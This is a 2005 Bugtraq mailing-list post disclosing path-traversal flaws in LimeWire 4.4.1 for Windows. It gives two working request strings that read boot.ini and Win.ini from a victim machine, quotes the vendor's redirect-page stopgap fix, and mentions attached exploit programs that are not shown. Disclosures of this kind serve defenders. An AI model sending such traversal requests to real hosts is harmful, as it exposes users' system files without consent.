Kevin Walsh: LimeWire Gnutella client two vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Kevin Walsh: LimeWire Gnutella client two vulnerabilities
From: Ill will <xillwillx@xxxxxxxxx>
Date: Wed, 16 Mar 2005 14:39:43 -0500
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type; b=dPexjsG6lu8botlE6uSsWHLk74EqymoL+9zBkz/D8c43CszdqO/75eNJi4vuSgUptJJxvDL2G++zWdW0p0cF1An/yTh0kFJfmSoOMBCuYnQ9ophLIgAFr9C1851gcyEcuqziLvaSFuhxwdQ9DwIiMwSijZ9KdBrAxiMuwCfcwPk=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: Ill will <xillwillx@xxxxxxxxx>

using limewire version 4.4.1 on windows
192.168.1.2:6346/gnutella/res/c\:boot.ini 
works perfectly fine
the magnet request
192.168.1.2/magnet10/../../../../../Windows/Win.ini?Simple-test
forwards you to a "fix" that they are using to patch all the new
version.. the simply put an index.html that meta-refresh forwards you
to their site

[html>
[head>
[title>Please Share</title>
[meta http-equiv="refresh" 
content="0; 
URL=http://www2.limewire.com/browser.htm";>
[/head>
[body>
[a href="http://www2.limewire.com/browser.htm";>Please Share[/a>
[/body>
[/html>

im also attaching to programs+ source  i wrote that either allow you
to read the files from the console
or download the file itself from the user

-- 
- illwill
http://illmob.org

Attachment: limewire.rar
Description: application/rar

Prev by Date: LLSSRV Redux
Next by Date: Linux ISO9660 handling flaws
Previous by thread: LLSSRV Redux
Next by thread: Linux ISO9660 handling flaws
Index(es):
- Date
- Thread